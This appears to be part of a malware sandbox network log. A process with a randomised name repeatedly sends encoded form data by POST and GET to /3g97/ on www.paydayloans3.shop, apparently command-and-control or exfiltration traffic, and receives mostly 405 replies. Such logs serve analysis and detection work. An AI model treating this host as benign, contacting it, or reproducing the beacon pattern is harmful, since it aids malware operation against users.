                                                                                              Apr 24, 2024 07:27:47.604283094 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:27:47 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.44976364.190.62.22801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:50.139935970 CEST760OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.paydayloans3.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.paydayloans3.shop
                                                                                              Referer: http://www.paydayloans3.shop/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 7a 57 46 42 41 4b 54 51 6e 53 56 69 6f 64 50 36 50 79 38 6b 2b 6d 34 64 7a 57 31 77 68 6d 68 30 37 59 33 7a 39 34 78 44 2f 32 68 42 57 45 6e 4e 59 74 6c 64 59 59 6e 56 58 4e 7a 53 45 71 44 55 49 70 61 55 34 2f 62 2b 59 50 34 6d 32 62 35 56 7a 2b 54 4e 44 78 58 70 36 32 63 35 47 39 33 6c 37 56 50 47 35 52 71 2b 46 37 58 74 35 62 67 7a 74 67 30 4d 55 72 36 74 6e 76 70 66 58 51 34 6d 57 41 65 38 36 6d 52 6c 30 4c 2f 43 74 36 42 67 62 77 78 64 72 4e 4f 32 64 56 51 38 70 78 4b 6e 57 79 66 4a 49 56 58 2f 38 48 33 64 67 76 63 5a 6f 53 6f 6d 79 36 72 58 6d 41 67 72 56 4e 34 67 38 74 6c 4f 74 76 79 46 5a 33 52 63 38 7a 36 50 31 52 34 4f 46 36 6f 3d
                                                                                              Data Ascii: 12l42=zWFBAKTQnSViodP6Py8k+m4dzW1whmh07Y3z94xD/2hBWEnNYtldYYnVXNzSEqDUIpaU4/b+YP4m2b5Vz+TNDxXp62c5G93l7VPG5Rq+F7Xt5bgztg0MUr6tnvpfXQ4mWAe86mRl0L/Ct6BgbwxdrNO2dVQ8pxKnWyfJIVX/8H3dgvcZoSomy6rXmAgrVN4g8tlOtvyFZ3Rc8z6P1R4OF6o=
                                                                                              Apr 24, 2024 07:27:50.449489117 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:27:50 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.44976464.190.62.22801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:52.980545998 CEST10842OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.paydayloans3.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.paydayloans3.shop
                                                                                              Referer: http://www.paydayloans3.shop/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 7a 57 46 42 41 4b 54 51 6e 53 56 69 6f 64 50 36 50 79 38 6b 2b 6d 34 64 7a 57 31 77 68 6d 68 30 37 59 33 7a 39 34 78 44 2f 32 70 42 57 33 76 4e 62 4b 4a 64 5a 59 6e 56 5a 74 7a 52 45 71 44 7a 49 70 53 51 34 2f 58 55 59 4e 77 6d 33 34 78 56 32 4d 72 4e 4d 78 58 70 34 32 63 38 62 74 33 77 37 56 2b 4f 35 52 36 2b 46 37 58 74 35 59 6f 7a 35 68 30 4d 57 72 36 75 69 76 70 62 41 41 35 7a 57 47 32 73 36 6d 46 66 30 2f 4c 43 74 65 6c 67 59 43 70 64 6b 4e 4f 30 63 56 52 68 70 78 47 43 57 79 44 72 49 52 57 51 38 48 7a 64 68 4a 68 2f 7a 57 34 69 77 70 50 56 7a 67 34 53 53 2b 49 51 6c 50 31 43 6a 74 71 45 4b 57 6b 30 6b 69 75 4c 6c 79 35 49 58 65 6b 4f 65 4b 75 57 79 4b 55 48 41 47 4c 64 63 67 77 46 78 65 43 74 33 4e 2b 64 6d 59 45 70 38 75 50 61 53 48 56 71 61 6d 54 54 6c 2f 41 31 76 76 55 57 73 44 6e 43 6c 32 58 5a 55 54 54 48 63 78 70 66 66 58 59 2b 68 69 69 68 55 34 6f 73 42 6c 6b 48 62 72 6f 4e 58 77 44 56 33 78 77 6c 74 33 72 51 59 42 35 4c 72 52 78 6e 4b 32 30 48 6a 63 68 6e 59 36 46 43 70 2f 62 56 6d 42 37 52 58 37 35 2b 53 63 76 50 59 75 4a 47 75 54 65 73 4b 55 53 68 48 59 7a 67 6a 36 46 43 49 4d 74 45 4a 78 37 2b 64 56 75 4a 75 7a 4c 33 2f 39 74 5a 6b 66 70 30 53 37 37 4c 58 48 51 4d 37 46 30 76 73 46 49 36 32 67 55 61 46 4f 2b 56 74 39 79 2b 70 54 4a 7a 55 6e 5a 36 4c 67 62 54 71 33 65 74 66 2f 76 75 73 48 65 71 59 53 39 31 6b 63 45 53 6b 57 71 48 35 73 66 51 56 68 78 34 2f 36 35 73 58 77 52 55 75 55 47 6e 6f 33 4c 59 46 56 55 43 6b 4f 47 6d 4f 79 6c 41 4a 45 35 35 62 64 4a 76 30 42 72 57 68 58 59 64 56 69 57 63 4a 58 72 4f 6a 6a 45 37 44 73 2f 6a 64 41 37 30 55 78 52 70 2b 2f 6c 61 75 68 51 6e 68 62 6a 4b 54 48 30 41 69 51 34 41 2f 75 36 48 6b 47 37 2f 4a 59 56 7a 41 4a 7a 33 32 58 30 44 6d 4e 79 57 51 77 32 43 36 53 41 37 64 41 75 4e 70 72 52 77 71 2b 34 76 35 66 48 4d 68 4f 77 44 54 52 64 55 50 54 52 47 36 38 39 68 44 66 63 59 5a 6c 4b 6a 59 4b 30 2b 51 35 76 69 36 38 57 54 78 67 68 59 64 67 34 4d 38 62 37 53 39 43 53 69 41 48 48 43 58 54 66 46 53 77 2b 75 2f 43 74 2f 72 50 4b 76 54 35 55 51 62 77 37 52 36 32 48 6b 4e 4e 67 44 72 43 58 33 76 74 49 45 2b 41 41 6e 59 2b 65 58 6f 2b 30 61 6d 52 51 68 66 4d 34 4b 74 72 37 6b 55 42 6e 65 41 2b 54 31 49 53 72 79 71 63 59 57 39 73 35 6b 6e 34 76 7a 68 4d 72 30 4f 67 30 52 75 47 50 39 7a 6a 66 38 2b 6b 45 73 42 46 42 56 50 70 79 55 72 52 52 74 6d 79 6f 79 67 72 70 32 56 45 64 4d 39 79 64 77 4c 48 55 58 74 46 6a 5a 44 5a 35 2b 64 5a 4b 68 4e 64 68 47 35 4a 79 50 49 6f 6b 30 32 61 59 48 2f 73 6d 2f 7a 48 48 33 43 50 56 63 5a 70 42 2b 75 57 71 69 5a 5a 37 66 50 38 2f 4e 71 71 6d 4e 6d 41 72 59 4e 4e 79 5a 35 48 4f 51 66 77 52 51 75 4f 46 38 6d 37 49 6e 44 39 65 52 43 6b 66 66 50 35 74 75 59 77 6b 6f 32 78 46 34 63 34 5a 57 30 38 2b 72 6b 55 57 4d 77 70 48 50 33 79 70 6b 32 76 33 70 59 51 34 54 77 38 5a 45 37 4d 42 2f 4e 4a 6e 2b 36 58 4c 71 5a 7a 2b 69 78 42 37 62 67 6f 42 38 66 4d 52 77 6e 70 7a 35 77 34 75 77 42 39 2b 6f 4c 6e 6c 6a 69 76 46 63 47 4f 72 63 6f 74 2b 49 41 70 4a 69 42 36 67 56 48 38 78 66 64 37 64 6b 77 48 56 78 56 57 4d 6b 73 4b 77 48 71 56 6e 4e 36 39 6d 65 44 65 32 2b 69 53 61 77 42 63 33 47 5a 64 56 78 6b 6a 6b 73 7a 65 43 53 4f 2f 50 30 37 2f 72 6a 4c 50 75 63 72 39 6d 2f 6e 32 6e 55 4a 5a 41 39 6e 33 4a 67 46 45 38 54 7a 67 4a 36 6f 35 59 6b 47 55 54 32 78 6a 6e 6b 72 52 61 4b 65 49 79 30 54 35 38 79 45 50 63 4b 76 45 2b 66 38 31 55 6c 76 35 65 52 46 69 33 6d 78 73 65 7a 64 57 2b 74 75 43 37 63 53 2b 62 6c 4a 36 32 6d 6a 34 36 54 4c 42 64 6e 48 53 77 43 36 52 46 41 65 65 4b 78 30 58 54 78 43 79 65 64 56 41 36 37 73 59 51 7a 6c 55 76 30 69 56 34 7a 76 6d 77 72 33 6c 36 32 6c 4e 46 49 2b 71 44 73 62 50 46 69 70 46 6d 45 4c 68 44 4d 6e 32 55 4c 44 6a 38 53 4d 79 73 32 35 45 77 62 78 2b 36 76 35 52 37 76 30 67 45 52 62 79 67 73 38 6f 73 64 45 65 47 6a 44 45 49 2f 66 77 55 51 71 4a 7a 4f 63 41 75 2b 32 57 4e 43 65 44 2f 56 51 78 47 45 72 38 39 5a 51 43 70 64 31 31 65 76 73 35 49 53 6c 5a 75 44 74 38 42 4e 66 4d 54 6d 41 44 2b 39 6a 62 6d 62 5a 4d 31 4a 71 67 78 67 49 50 78 47 4b 62 52 45 72 30 55 6c 70 6a 59 34 4e 46 4b 62 50 45 53 7a 65
                                                                                              Data Ascii: 12l42=zWFBAKTQnSViodP6Py8k+m4dzW1whmh07Y3z94xD/2pBW3vNbKJdZYnVZtzREqDzIpSQ4/XUYNwm34xV2MrNMxXp42c8bt3w7V+O5R6+F7Xt5Yoz5h0MWr6uivpbAA5zWG2s6mFf0/LCtelgYCpdkNO0cVRhpxGCWyDrIRWQ8HzdhJh/zW4iwpPVzg4SS+IQlP1CjtqEKWk0kiuLly5IXekOeKuWyKUHAGLdcgwFxeCt3N+dmYEp8uPaSHVqamTTl/A1vvUWsDnCl2XZUTTHcxpffXY+hiihU4osBlkHbroNXwDV3xwlt3rQYB5LrRxnK20HjchnY6FCp/bVmB7RX75+ScvPYuJGuTesKUShHYzgj6FCIMtEJx7+dVuJuzL3/9tZkfp0S77LXHQM7F0vsFI62gUaFO+Vt9y+pTJzUnZ6LgbTq3etf/vusHeqYS91kcESkWqH5sfQVhx4/65sXwRUuUGno3LYFVUCkOGmOylAJE55bdJv0BrWhXYdViWcJXrOjjE7Ds/jdA70UxRp+/lauhQnhbjKTH0AiQ4A/u6HkG7/JYVzAJz32X0DmNyWQw2C6SA7dAuNprRwq+4v5fHMhOwDTRdUPTRG689hDfcYZlKjYK0+Q5vi68WTxghYdg4M8b7S9CSiAHHCXTfFSw+u/Ct/rPKvT5UQbw7R62HkNNgDrCX3vtIE+AAnY+eXo+0amRQhfM4Ktr7kUBneA+T1ISryqcYW9s5kn4vzhMr0Og0RuGP9zjf8+kEsBFBVPpyUrRRtmyoygrp2VEdM9ydwLHUXtFjZDZ5+dZKhNdhG5JyPIok02aYH/sm/zHH3CPVcZpB+uWqiZZ7fP8/NqqmNmArYNNyZ5HOQfwRQuOF8m7InD9eRCkffP5tuYwko2xF4c4ZW08+rkUWMwpHP3ypk2v3pYQ4Tw8ZE7MB/NJn+6XLqZz+ixB7bgoB8fMRwnpz5w4uwB9+oLnljivFcGOrcot+IApJiB6gVH8xfd7dkwHVxVWMksKwHqVnN69meDe2+iSawBc3GZdVxkjkszeCSO/P07/rjLPucr9m/n2nUJZA9n3JgFE8TzgJ6o5YkGUT2xjnkrRaKeIy0T58yEPcKvE+f81Ulv5eRFi3mxsezdW+tuC7cS+blJ62mj46TLBdnHSwC6RFAeeKx0XTxCyedVA67sYQzlUv0iV4zvmwr3l62lNFI+qDsbPFipFmELhDMn2ULDj8SMys25Ewbx+6v5R7v0gERbygs8osdEeGjDEI/fwUQqJzOcAu+2WNCeD/VQxGEr89ZQCpd11evs5ISlZuDt8BNfMTmAD+9jbmbZM1JqgxgIPxGKbREr0UlpjY4NFKbPESzeBHjyKTX/iiDD8BuiHzqBoUE+3cxABsMtQXqqR05q4djDJQ4obf4MO9OxYmIYLQ99PNXQWvWBmaV952yxUPvMlDHz+TcOzNqBbWlq3NuFmiyZ82i23S57etalAseki9E1lHuxWdU5djK7ldfSerbOB5TUgCSOS2+3e49xPS9qPtz+E+GUmcuMWJNYfm71/+M/VXwfisRMckTvhEgg0JzaUJQS+WZZdkLNRq3GlP2Wg/67zkd7nJooHh86g7KsAOCOqYJbYUQyieRmpVwTFg3QLGnFhnCmLt+AgVEwoLwdjiBfTva5IJs6LI16VoE9Ga6Euu/DGaOaECgRPiFVM29UtRLKZzm+4g9XugErOnC6Y6+JqA9P+4L7OOtaWWP76fBiffDH5cPABx0GvOFBocFnpN3q0MvEw61S6MfYeXZ5VbUHrOF9JihCiy1Pk4u+vJ+9Oe4jvokdgLEHtUpNELsjJeV0aMfoSCyct0CmEsRe15iMmtwitQvXGtn5VtVqjsGresdOFW93lRRzvSyR37WThusoBP1wCtUR0iD6AKEDB24mcg6GJ/FEBS3dD2+zbhgorhj8d4WRS6ONObkbNOKALIk8QEas5QAsVeYY1OVSJfRY+AeVEu8ss/bP4eIbsqAigL59Qm9QsmLqozKHmAjJMAf2ZHc2h6Jv+RIOQyuZcCU4JlF6u0Phl3ajPfNg3+sSe/fq/wQapJ1+byIPGnW1D0+Pf5uwRyu3YEviJbwkrh0FUiOnV42AWz+xwikperoZ9fevMPkQdYQ86qo1w2oDub5AOVTvWsFZgXCqyA4aoeLIo8ZUmZ5yB1tVGkybafF1Klimw87d91kURRMXEKEVCR3dDQXhSbByER1EzMO8cqC4dvT6ureATsYFuxefhjl44rETTLtz8b54xzb0Exzntdx17DrALzGMsAICisbz6N6gyhVdoH0aVelHlrYLNe5pit+t1QwVvB39ISzv9vyQdSt+ipTLRR0Mj7bieIoqpLWwDlhwxDhhzx8LEtYOJHjX29JJOARIot+cxi1MANiQJhVbJXSA+fdmZ1JBvGl7HaLwhKztiS9okqHjiJRwx5zmRpnkLGzuFuwFk+PMWRi1tKnheeHJz5kWwTXDmDwMzcOpiGHoxIOEMGxAlP30bIuVC9kfTkk6dnnmG2QOSV7AsFJQxF6ttH6k4kTOOT04fBoV53Sa7sMHW86UC7Z05yu5xIfonrGF54BMxqeMickdYUHDQhMWIOkthm7PnSt466fWCdvscYz3FbCki0ODmIGhlg0YWdUMAQ6OpEyIad3ZzLOeiE/dPKNHBUMeghcy9arsVUJPpJKz+A3dcAsdVYLKGEAx1iV2MKB06KzHqw+oMiF0OtBf3gBOWDQmFD9Pn9vYXyBMHtUSj0WKEvFeIyrB+n5LWgRppnY/QqmFjGKiTNkR4YegRCvZD9wBtLpcPv/Kgo5ex2cYjNv1AkpacMIqfl7qfquBnUr0+5lw4YPkjYht37qgFAiEEiPcvjAb1wU4kPv8SGChk7/MlLhpdtdXDnUHhSYmr4MRPUeBpdj1B+81chSvNR6jbKqa6nVkIltI1X9F/S5eX4BYnOo9fEnCVe+eZM1CqI7BTstAggEeNEOnKodazNSPygQ5DLFuAqVt9tzk9XmA89yFtl1l1kc9fYp4xB2+NThS1Sf+Ima00KeJwlFhCQ13tFBefwfAjCpEexl/iQYnNekq3z1lQvIyOugrON78pfxx4sq5I1bb9gXXJhhj5KPkYb0hblak9sPw220lX3GxQVrSq0acLj0JtxPO7rhmwggDpmieSD76H2j+AzvV2tKu20HU47gaXVX9WDiXVB6/uZYxMqiQU8+jFTrWoJHhILDeMYqO2qLOwO22rr9SYY/r4KyaeXgH6fIZ9z7cmmzJmXQnKVFjXJcGwCekJ7AEM6u0CQFDHitqdQ7IEOuiz480R9nGS3Z8BJuhWR49bzT6Ys7Ac6PHUIqjLuKuK8L8yfzzpc0Xav3BWPB37NzcmJXKApR6bVZJNp31KaDLiXHFCSXNv61ulPfy3saWOpXnyAalEEwNkhp0MAfvMfVD8jU1S+lEY4yLav/6prAOMM7qRRjWaWBczPsZLPAn9ffcOCLS6srsdi9MHWU1C9wETOO7ErvKA0BaSZZ4tUSzj89e9BSWEhlOq/IhijZ/rJHTDAcua9e1TqS2WDu2W3jGqUp/4+q0Q5JOa8qfiWqgjQWTozy//E2D8ovNNOuul7bQqdJ9egNAZg+CmADDNZWOCiJ6Ftd8XGufOsRTd96tHqHUSKL8Or5zJfxLkqDggc5okKxyj7zImk5ds+hret5bk1N35y+FOMAJ2PlfPK9fn37lGpJTiy+DplsZxLs23zlgNCCPk7ufVTMAQv6IfgiMZ7nFzitbCqqsPiOz/efZckjwCbqq7BruD6sSeihrodUKuSui5H0NWb4hRkhNzM47XQBTLiXxIy/z7V5yuZWTpGJohu3T3OFRtAGv8usKJM/MfnbkMeix8/+tOQXze3V3GL6U+jWVpdBZ4fSZUVVKTZZ5ZvxxMMzH2S+oVas5NM1Vmv2XDrwIua/OBzLYlc0kukZ5MkPdFzzscOUUaIDoiecYKMtYk+0ag+2UzGMoQ1iDA2pBD5iZSKlc1eVZg3LkVNOkhfEAbapVBinNfHFPfF7ZnHrTf0kIbZhYH9OphN0HhLOsu6x2pq25xDNqyWqsEbZz+dV
                                                                                              Apr 24, 2024 07:27:53.285751104 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:27:53 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.44976564.190.62.22801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:56.800787926 CEST459OUTGET /3g97/?12l42=+UthD+705U1ao7DlNG8D0XAg53Vx3iw389CE+agLgXg1A2DbEeFYSszaWdWCIKr2NLn015a/QKEJl6wBw76YOQKFwTcvF/Pv+Bjw8BucK5rNlKIw4A0tIOg=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.paydayloans3.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:27:57.134358883 CEST1289INHTTP/1.1 200 OK
                                                                                              date: Wed, 24 Apr 2024 05:27:56 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              x-powered-by: PHP/8.1.17
                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              pragma: no-cache
                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_FYvebS821B7iMhfNZ/w1gmKNORywM1xHMwIFgJro8gjUxuyZDDB0gTHyNFxY06mFm3hR7koL1z6+Ii61ArdNnA==
                                                                                              last-modified: Wed, 24 Apr 2024 05:27:56 GMT
                                                                                              x-cache-miss-from: parking-6fb6b6d5c7-zmw4w
                                                                                              server: NginX
                                                                                              connection: close
